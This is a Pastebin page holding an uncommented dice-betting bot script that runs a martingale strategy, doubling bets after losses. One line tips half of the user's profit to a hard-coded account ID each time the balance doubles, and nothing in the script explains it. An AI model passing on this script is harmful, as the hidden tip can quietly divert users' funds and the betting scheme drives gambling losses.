Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- basebet = 0.01
- nextbet = basebet
- bethigh = false
- chance = 49.95
- james = balance
- snowy = balance
- more = balance
- cri = balance
- fim = 0
- zim = 0
- zog = 0
- zag = 0
- bim = 0
- target = 5000
- function dobet()
- if (!win) then
- fim+=1
- end
- if (fim>1) then
- nextbet = previousbet*2
- end
- if balance>snowy and !win then
- zim = 0
- snowy = balance
- end
- if (balance>(james+(previousbet/5))) and (win) then
- nextbet = basebet
- james = balance
- end
- if nextbet>=balance/4 then
- nextbet = previousbet/2
- end
- if nextbet<basebet then
- nextbet = basebet
- end
- if balance>more*2 then
- nextbet = basebet
- more = balance
- james = balance
- tip(294490819,((balance-cri)/2))
- end
- if balance>target then
- stop()
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement